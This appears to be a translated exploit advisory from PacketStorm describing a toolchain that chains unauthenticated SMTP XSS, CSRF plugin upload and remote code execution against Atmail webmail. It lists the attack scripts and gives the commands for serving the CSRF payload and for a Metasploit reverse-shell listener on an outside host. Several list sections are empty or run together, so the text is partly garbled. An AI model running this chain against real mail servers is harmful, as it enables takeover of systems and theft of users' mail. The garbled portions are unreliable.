[PacketStorm] [WLB-2020080010]
免责声明:此漏洞利用工具链的灵感来自 EDB-ID 20009。
此漏洞利用工具链的目标是替代 EDB-ID 20009。
该工具链相对于 EDB-ID 20009 漏洞利用的优势:
EDB-ID 20009 漏洞利用的缺点:
msfvenom 生成反向 Shell)在 ArchLinux 上安装依赖:
$ sudo pacman -S metasploit tar ruby
漏洞利用文件:
config.yml 包含工具链配置exploit.sh 需要执行的漏洞利用包装脚本xss_mail.rb 将通过 Atmail SMTP 服务器(未认证)向管理员发送包含 XSS 的邮件。csrf_prepare.rb 将准备 CSRF Payload(设置目标并编码插件归档)rce_prepare.rb 将准备 RCE(生成反向 Shell 并创建插件归档)csrf_plugin.js 准备好的 CSRF Payloadnoraj/ 文件夹,包含未压缩的插件架构该漏洞利用工具链只需 2 个手动步骤:
config.ymlexploit.sh但在发起攻击之前,需要一个 Web 服务器来分发 JavaScript CSRF 文件,并且需要有一个反向 Shell 监听器等待连接。因此攻击流程更像是:
config.ymlcsrf_plugin.jsexploit.sh单行 HTTP 服务器示例:
$ ruby -run -e httpd . -p 8000
反向 Shell 监听器示例:
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload php/reverse_php
payload => php/reverse_php
msf5 exploit(multi/handler) > set LHOST 1.1.1.1
LHOST => 1.1.1.1
msf5 exploit(multi/handler) > set LPORT 8080
LPORT => 8080
msf5 exploit(multi/handler) > run